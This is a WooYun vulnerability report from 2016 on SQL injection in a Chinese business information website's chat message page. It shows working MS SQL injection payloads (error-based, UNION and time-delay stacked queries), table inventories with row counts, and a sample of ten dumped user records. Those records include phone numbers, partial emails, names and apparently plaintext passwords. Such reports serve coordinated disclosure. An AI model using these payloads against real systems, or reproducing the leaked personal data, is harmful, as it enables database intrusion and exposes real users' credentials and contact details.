漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2016-0168118
漏洞标题:中商信息网SQL注入导致200w用户数据测漏
相关厂商:中商信息网
漏洞作者: 路人甲
提交时间:2016-01-08 02:28
修复时间:2016-02-22 16:48
公开时间:2016-02-22 16:48
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2016-01-08: 细节已通知厂商并且等待厂商处理中
2016-01-12: 厂商已经确认,细节仅向厂商公开
2016-01-22: 细节向核心白帽子及相关领域专家公开
2016-02-01: 细节向普通白帽子公开
2016-02-11: 细节向实习白帽子公开
2016-02-22: 细节向公众公开
简要描述:
RT
详细说明:
http://**.**.**.**/03/chat/messagelist.asp?id=
漏洞证明:
Place: GET
Parameter: id
Type: error-based
Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause
Payload: id=-8735' OR 5469=CONVERT(INT,(SELECT CHAR(113)+CHAR(114)+CHAR(118)+CHAR(116)+CHAR(113)+(SELECT (CASE WHEN (5469=5469) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(107)+CHAR(108)+CHAR(113))) AND 'stgN'='stgN
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: id=' UNION ALL SELECT NULL,CHAR(113)+CHAR(114)+CHAR(118)+CHAR(116)+CHAR(113)+CHAR(103)+CHAR(69)+CHAR(102)+CHAR(111)+CHAR(99)+CHAR(66)+CHAR(65)+CHAR(119)+CHAR(98)+CHAR(104)+CHAR(113)+CHAR(98)+CHAR(107)+CHAR(108)+CHAR(113)--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: id='; WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
Database: DataCenter
+---------------------------------+---------+
| Table | Entries |
+---------------------------------+---------+
| operator.PR_2011_987 | 625553 |
| operator.PR_2011_993 | 264059 |
| operator.PR_2011_147 | 227062 |
| operator.PR_2011_719 | 208377 |
| dbo.PR_2009_147 | 186090 |
| operator.PR_2010_147 | 179217 |
| operator.PR_2011_985 | 172131 |
| operator.PR_2012_987 | 166894 |
| operator.PR_2010_987 | 165872 |
| operator.PR_2011_915 | 149438 |
| operator.PR_2010_719 | 146918 |
| operator.PR_2010_915 | 125781 |
| operator.PR_2010_985 | 121511 |
| operator.PR_2011_1019 | 120106 |
| dbo.PR_2007_587 | 120099 |
| operator.PR_2010_993 | 114644 |
| dbo.PR_2008_252 | 108039 |
| operator.PR_2009_587 | 107758 |
| operator.PR_2009_433 | 106396 |
| dbo.PR_2008_587 | 105188 |
| operator.PR_2011_87 | 94093 |
| operator.PJ_2007_pricejob | 85616 |
| operator.PR_2010_252 | 85319 |
| operator.PJ_2009_pricejob | 81524 |
| operator.PR_2010_1019 | 77433 |
| operator.PR_2011_1271 | 70126 |
| operator.PR_2011_1271 | 70126 |
| operator.PR_2012_993 | 66896 |
| operator.PR_2010_87 | 64127 |
| dbo.PR_2006_587 | 61433 |
| dbo.PR_2007_516 | 58927 |
| operator.PR_2011_1020 | 58490 |
| operator.PR_2009_144 | 58164 |
| dbo.PR_2008_516 | 57224 |
| operator.PR_2012_147 | 55647 |
| operator.PJ_2006_pricejob | 55638 |
| operator.PR_2009_245 | 53897 |
| operator.PR_2011_984 | 52725 |
| dbo.PR_2005_587 | 51695 |
| operator.PR_2011_1021 | 50699 |
| operator.PR_2009_516 | 50110 |
| dbo.PR_2007_252 | 49405 |
| operator.PR_2010_551 | 48594 |
| operator.PR_2010_1030 | 47184 |
| operator.PJ_2008_pricejob | 46551 |
| dbo.PR_2008_875 | 46120 |
| operator.PR_2010_587 | 45975 |
| dbo.PR_2006_516 | 45288 |
| operator.PR_2011_1022 | 44974 |
| operator.PR_2012_719 | 44438 |
| operator.PR_2010_516 | 44286 |
| operator.PR_2010_310 | 44233 |
| dbo.PR_2009_498 | 43326 |
| dbo.PR_2008_873 | 43024 |
| operator.PR_2011_44 | 42659 |
| operator.PR_2012_985 | 41874 |
| operator.PR_2009_252 | 41721 |
| operator.PR_2009_915 | 40995 |
| operator.PR_2010_1271 | 40382 |
| operator.PR_2010_204 | 39482 |
| operator.PR_2010_1020 | 38593 |
| operator.PR_2010_491 | 37372 |
| operator.PR_2010_248 | 37202 |
| operator.PR_2010_588 | 37058 |
| operator.PR_2010_1021 | 37021 |
| dbo.PR_2008_551 | 36995 |
| operator.PR_2011_252 | 36801 |
| dbo.PR_2008_172 | 36456 |
| operator.PR_2011_516 | 36390 |
| dbo.PR_2009_551 | 36079 |
| operator.PR_2011_588 | 35689 |
| operator.PR_2010_984 | 35513 |
| operator.PR_2010_201 | 34859 |
| operator.PR_2012_915 | 33398 |
| dbo.PR_2008_433 | 32449 |
| operator.PR_2010_199 | 32042 |
| operator.PJ_2010_pricejob | 31941 |
| operator.PR_2010_1022 | 31223 |
| operator.PR_2011_1023 | 31087 |
| operator.PR_2010_177 | 30805 |
| operator.PR_2009_719 | 29932 |
| operator.PR_2011_172 | 29777 |
| operator.PR_2010_495 | 29425 |
| operator.PR_2010_289 | 29187 |
| operator.PR_2011_1026 | 29031 |
| operator.PR_2009_310 | 28662 |
| dbo.PR_2008_147 | 27798 |
| operator.PR_2011_1246 | 27273 |
| operator.PR_2010_1102 | 26878 |
| operator.PR_2009_875 | 26766 |
| operator.PR_2010_519 | 26683 |
| operator.PR_2009_653 | 26654 |
| operator.PR_2011_248 | 26508 |
| operator.PR_2012_1019 | 26255 |
| operator.PR_2009_172 | 25996 |
| operator.PR_2010_1023 | 25945 |
| operator.PR_2009_201 | 25775 |
| dbo.PR_2008_341 | 25437 |
| operator.PR_2011_1025 | 25374 |
| operator.PR_2011_1102 | 24522 |
| operator.PR_2010_341 | 23777 |
| operator.PR_2009_873 | 23283 |
| operator.PR_2009_199 | 22978 |
| operator.PR_2009_341 | 22458 |
| operator.PR_2009_341 | 22458 |
| operator.PR_2009_184 | 22230 |
| operator.PR_2011_201 | 22073 |
| dbo.PR_2008_144 | 21745 |
| operator.PR_2009_519 | 21466 |
| operator.PR_2010_188 | 21231 |
| operator.PR_2010_1246 | 21210 |
| dbo.PR_2008_125 | 21084 |
| operator.PR_2011_1245 | 20905 |
| operator.PR_2010_238 | 20801 |
| operator.PR_2011_291 | 20507 |
| operator.PR_2010_498 | 20138 |
| operator.PR_2011_491 | 20102 |
| operator.PR_2010_1025 | 19674 |
| operator.PR_2009_204 | 19613 |
| operator.PR_2010_1245 | 19410 |
| dbo.PR_2009_491 | 19401 |
| operator.PR_2009_238 | 19191 |
| dbo.PR_2008_846 | 19124 |
| dbo.PR_2007_125 | 18942 |
| dbo.sysconstraints | 18925 |
| dbo.PR_2008_245 | 18752 |
| operator.PR_2010_1026 | 18697 |
| operator.PR_2009_987 | 18474 |
| operator.PR_2010_1028 | 18430 |
| operator.PR_2012_1271 | 18370 |
| dbo.PR_2006_433 | 17433 |
| operator.PR_2010_1101 | 17278 |
| operator.PR_2010_523 | 17152 |
| operator.PR_2009_188 | 17080 |
| dbo.PR_2008_124 | 16899 |
| dbo.PR_2008_44 | 16695 |
| operator.PR_2010_44 | 16590 |
| dbo.PR_2008_495 | 16413 |
| operator.PR_2010_1210 | 16251 |
| operator.PR_2010_1219 | 15772 |
| operator.PR_2011_1101 | 15731 |
| operator.PR_2011_204 | 15680 |
| operator.PR_2011_1030 | 15513 |
| operator.PR_2010_1211 | 15469 |
| operator.PR_2011_289 | 15420 |
| operator.PR_2011_1028 | 15252 |
| dbo.priceclass | 15241 |
| operator.PR_2012_984 | 15185 |
| dbo.PR_2005_433 | 15003 |
| dbo.PR_2008_874 | 14924 |
| operator.PR_2010_923 | 14675 |
| operator.PR_2009_1019 | 14444 |
| operator.PR_2009_993 | 14299 |
| operator.PR_2009_289 | 14248 |
| operator.PR_2011_533 | 14127 |
| dbo.PR_2009_495 | 13965 |
| operator.PR_2010_374 | 13949 |
| operator.PR_2009_872 | 13748 |
| operator.PR_2009_828 | 13734 |
| dbo.PR_2007_124 | 13597 |
| operator.PR_2012_1020 | 13419 |
| operator.PR_2011_238 | 13303 |
| operator.PR_2010_1113 | 13225 |
| operator.PR_2010_1215 | 13201 |
| operator.PR_2010_291 | 13049 |
| dbo.PR_2008_201 | 13025 |
| operator.PR_2011_1274 | 12804 |
| operator.PR_2011_523 | 12797 |
| operator.PR_2011_199 | 12596 |
| operator.PR_2010_920 | 12563 |
| operator.PR_2009_125 | 12532 |
| operator.PR_2010_1274 | 12484 |
| operator.PR_2010_1225 | 12453 |
| operator.PR_2010_1222 | 12430 |
| operator.PR_2011_519 | 12264 |
| operator.PR_2011_495 | 12168 |
| operator.PR_2010_172 | 12148 |
| operator.PR_2009_177 | 11907 |
| operator.PR_2012_1021 | 11820 |
| operator.PR_2009_588 | 11392 |
| dbo.PR_2009_494 | 11351 |
| operator.PR_2011_1027 | 11250 |
| operator.PR_2010_1229 | 11018 |
| operator.PR_2009_577 | 11004 |
| operator.PR_2011_551 | 10508 |
| operator.PR_2009_1030 | 10461 |
| operator.PR_2010_462 | 10399 |
| operator.PR_2009_920 | 10346 |
| operator.PR_2009_462 | 10338 |
| operator.PR_2010_375 | 10244 |
| dbo.PR_2008_868 | 10164 |
| operator.PR_2009_176 | 10075 |
| operator.PR_2009_44 | 9636 |
| dbo.PR_2008_176 | 9633 |
| operator.PR_2009_846 | 9553 |
| operator.PR_2009_214 | 9327 |
| operator.PR_2012_1022 | 9211 |
| operator.PR_2010_1027 | 9021 |
| operator.PR_2009_471 | 8946 |
| operator.PR_2010_828 | 8706 |
| operator.PR_2011_498 | 8682 |
| operator.PR_2009_232 | 8644 |
| operator.PR_2010_1228 | 8642 |
| operator.PR_2010_176 | 8600 |
| operator.PR_2010_432 | 8380 |
| dbo.PR_2008_214 | 8241 |
| operator.PR_2011_578 | 8109 |
| operator.PR_2009_233 | 8064 |
| operator.PR_2011_1215 | 7770 |
| operator.PR_2011_1113 | 7756 |
| operator.PR_2009_868 | 7686 |
| dbo.PR_2008_879 | 7672 |
| dbo.PR_2008_881 | 7650 |
| dbo.TProductClass | 7613 |
| operator.PR_2011_341 | 7558 |
| operator.PR_2011_596 | 7548 |
| operator.PJ_2005_pricejob | 7547 |
| operator.PR_2009_874 | 7537 |
| operator.PR_2010_433 | 7448 |
| dbo.PR_2008_232 | 7442 |
| operator.PR_2010_233 | 7433 |
| dbo.PR_2008_893 | 7402 |
| operator.PR_2012_1023 | 7392 |
| operator.PR_2010_214 | 7347 |
| operator.PR_2010_1167 | 7294 |
| dbo.PR_2008_491 | 7260 |
| operator.PR_2010_1231 | 7188 |
| operator.PR_2009_248 | 7109 |
| dbo.PR_2009_432 | 7095 |
Table: TUCommRegister_TMP
[10 entries]
+-------+----------------------+----------------+----------------------+----------------------+---------------+---------------+------+--------------------------+-------+---------+--------------------+---------+----------+------------+----------+----------+-----------+---------------------+------------+-------------------+----------------+-----------------+------------------+----------------------+
| ResId | UserId | ICardId | UniqueId | CompanyId | IP | Tel | PWD | Email | DogSN | Gender | RegDate | AllowNo | UserType | Password | FirstCol | RegCount | SecondCol | givenName | ActiveStat | Occupation | passwordAnswer | CompanyDivision | passwordReminder | PerformanceInterests |
+-------+----------------------+----------------+----------------------+----------------------+---------------+---------------+------+--------------------------+-------+---------+--------------------+---------+----------+------------+----------+----------+-----------+---------------------+------------+-------------------+----------------+-----------------+------------------+----------------------+
| P001 | <blank> | <blank> | U1307141055558009746 | C1307141055553196072 | **.**.**.** | | NULL | <blank> | NULL | <blank> | 07 14 2013 10:55AM | NULL | NULL | <blank> | k1 | 0 | <blank> | NULL | -2 | <blank> | NULL | <blank> | NULL | NULL |
| P001 | BG130709141015214704 | <blank> | U1307091410331545008 | C1307091410330991981 | **.**.**.** | 32653912235 | NULL | rikky@**.**.**.** | NULL | 0 | 07 9 2013 2:10PM | NULL | NULL | 7Tc5xp | 4S | 243 | 4S16 | Yllacjdw Yllacjdw | -2 | ywlZporgDbGH | NULL | <blank> | NULL | NULL |
| P001 | BG130630044957920038 | <blank> | U1306300450199804007 | C1306300450198260989 | **.**.**.** | 95271947725 | NULL | dirtbill@**.**.**.** | NULL | 0 | 06 30 2013 4:50AM | NULL | NULL | o0Stun | 4S | 218 | 4S10 | Stephanie Stephanie | -2 | lqGACDHLEcZEDpl | NULL | <blank> | NULL | NULL |
| P001 | yueyao02 | 13903682679 | U1103121311574161332 | C1103121311573527225 | **.**.**.** | 13903682679 | NULL | 312219801@**.**.**.** | NULL | 1 | 03 12 2011 12:10PM | NULL | NULL | 20100206 | 48 | 2 | 4806 | ÖěŔňžę | -2 | ŇľÎńČËÔą | NULL | <blank> | NULL | NULL |
| P001 | wfdjc | 18241172833 | U1307201619223008828 | C1307201619222454711 | **.**.**.** | 0411-62578743 | NULL | 2216683507@**.**.**.** | NULL | <blank> | 07 20 2013 4:19PM | NULL | NULL | nhqhxflxkj | 23 | 1 | <blank> | ÄĎşŁČŞ | -2 | ĆóŇľ¸şÔđČË | NULL | <blank> | NULL | NULL |
| P001 | BG150629074141482953 | <blank> | U1506290742191727312 | C1506290742190183304 | **.**.**.** | 77193565448 | NULL | sanford2t@**.**.**.** | NULL | 0 | 06 29 2015 7:42AM | NULL | NULL | 5C7GMX | 4S | 30 | 4S10 | Eddie Eddie | -2 | obHrmyhbKgsSRtJvE | NULL | <blank> | NULL | NULL |
| P001 | BG150617093313953171 | <blank> | U1506170933175923426 | C1506170933174389309 | **.**.**.** | 58094047589 | NULL | jordonc22@**.**.**.** | NULL | 0 | 06 17 2015 9:33AM | NULL | NULL | 3OjI7L | 4S | 32 | 4S16 | Abigail Abigail | -2 | JAsbBDIIUe | NULL | <blank> | NULL | NULL |
| P001 | BG130905090214560096 | <blank> | U1309050902210997295 | C1309050902219353288 | **.**.**.** | 59149879488 | NULL | cooler111@**.**.**.** | NULL | 0 | 09 5 2013 9:02AM | NULL | NULL | MiGvm4 | 4S | 580 | 4S42 | Mason Mason | -2 | uwJNnriqkpJQY | NULL | <blank> | NULL | NULL |
| P001 | BG130411161557344844 | <blank> | U1304111619139697479 | C1304111619138053352 | **.**.**.** | 13067216009 | NULL | xiaolongbao08@**.**.**.** | NULL | 0 | 04 11 2013 4:19PM | NULL | NULL | 12345 | 48 | 1 | 4823 | ĘYŐţąë | -2 | ѧÉú | NULL | <blank> | NULL | NULL |
| P001 | [email protected] | +886-926710139 | U1112102211467026513 | C1112102211465472405 | **.**.**.** | 02-926710139 | NULL | jason0213tw@**.**.**.**.tw | NULL | <blank> | 12 10 2011 10:11PM | NULL | NULL | chou39 | 14 | 1 | <blank> | ÖÜŐýČŮ | -2 | ĆóŇľ¸şÔđČË | NULL | <blank> | NULL | NULL |
+-------+----------------------+----------------+----------------------+----------------------+---------------+---------------+------+--------------------------+-------+---------+--------------------+---------+----------+------------+----------+----------+-----------+---------------------+------------+-------------------+----------------+-----------------+------------------+----------------------+
Database: DBMachine
+--------------------------+---------+
| Table | Entries |
+--------------------------+---------+
| dbo.Product_Release | 1676400 |
| dbo.Product_Release11 | 1269831 |
| dbo.Tcom_ProductClass | 102784 |
| dbo.UserInfo | 54910 |
| dbo.TProduct | 50971 |
| dbo.TProduct11 | 36786 |
| dbo.TMachine | 30553 |
| dbo.TMachine11 | 30553 |
| dbo.UserInfo11 | 6653 |
| dbo.TSubColName | 1381 |
| dbo.TSubColName11 | 1381 |
| dbo.TCable | 1363 |
| dbo.TCable11 | 1363 |
| dbo.TColName | 560 |
| dbo.TColName11 | 560 |
| dbo.TSuperCol | 53 |
| dbo.TSuperCol11 | 53 |
| dbo.sysconstraints | 16 |
| dbo.syssegments | 3 |
+--------------------------+---------+
修复方案:
参数过滤
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:10
确认时间:2016-01-12 15:09
厂商回复:
CNVD未直接复现所述情况,已由CNVD通过网站管理方公开联系渠道向其邮件通报,由其后续提供解决方案。
最新状态:
暂无